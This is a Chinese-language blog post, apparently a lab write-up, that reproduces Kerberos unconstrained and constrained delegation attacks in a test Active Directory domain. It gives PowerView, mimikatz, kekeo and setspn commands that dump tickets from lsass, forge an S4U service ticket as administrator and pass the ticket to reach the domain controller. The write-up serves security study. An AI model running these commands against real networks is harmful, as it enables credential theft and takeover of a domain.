约束委派攻击复现

  1. 非约束委派攻击
  2. 约束委派攻击

不清楚原理先来复现一下

测试环境如下:

  • dc 192.168.43.100(域控) administrator(域管)
  • Test08 192.168.43.110(域内机器) testuser(域内普通用户)
  • 域 hacke.testlab

非约束委派攻击

首先我们要设置test08机器有非约束委派的属性

我们可以使用powersploit中的脚本来获取具有非约束委派的机器:

1
2
Import-Module .\PowerView.ps1;
Get-NetComputer -Unconstrained -Domain hacke.testlab

使用域管账号访问Test08这台机器

这个时候会在test08这台机器上的lsass.exe内存中留下留下票据信息

testuser用户登录test08这台机器,mimikatz导出票据:

1
2
privilege::debug
sekurlsa::tickets /export

这里可以看见有一个域管的票据,用mimikat导入进去

1
kerberos::ptt [0;1f78b6]-2-0-60a10000-Administrator@krbtgt-HACKE.TESTLAB.kirbi

这个时候在同一cmd下发现可以访问dc了

可以利用psexec直接cmd过去

域控就拿下了

约束委派攻击

首先要将域用户委派设置为域控的cifs
test= testuser,一个是名称一个是登录名,懒得改了

将testuser用户设置成服务账号

1
2
setspn -U -A SQLServer/test08.hacke.testlab/MSSQL testuser
setspn -L testuser

我们可以利用先前的powerview工具来查看域中的服务账号:

1
Import-Module .\powerview.ps1;Get-DomainUser -TrustedToAuth -Domain hacke.testlab | select name

利用kekeo工具生成票据

1
2
3
tgt::ask /user:test /domain:hacke.testlab /password:xxxx

tgs::s4u /tgt:TGT_testuser@HACKE.TESTLAB_krbtgt~hacke.testlab@HACKE.TESTLAB.kirbi /user:administrator@hacke.testlab /service:cifs/dc.hacke.testlab

mimikatz导入票据

1
kerberos::ptt TGS_administrator@hacke.testlab@HACKE.TESTLAB_testuser@HACKE.TESTLAB.kirbi


可以访问dc了

不过这种方法有前提条件,就是服务账号cifs设置的是域控的地址


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 sher10cksec@foxmail.com

文章标题:约束委派攻击复现

本文作者:sher10ck

发布时间:2020-12-15, 16:02:28

最后更新:2020-12-16, 17:40:48

原始链接:http://sherlocz.github.io/2020/12/15/kerberos-constrained-delegation/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录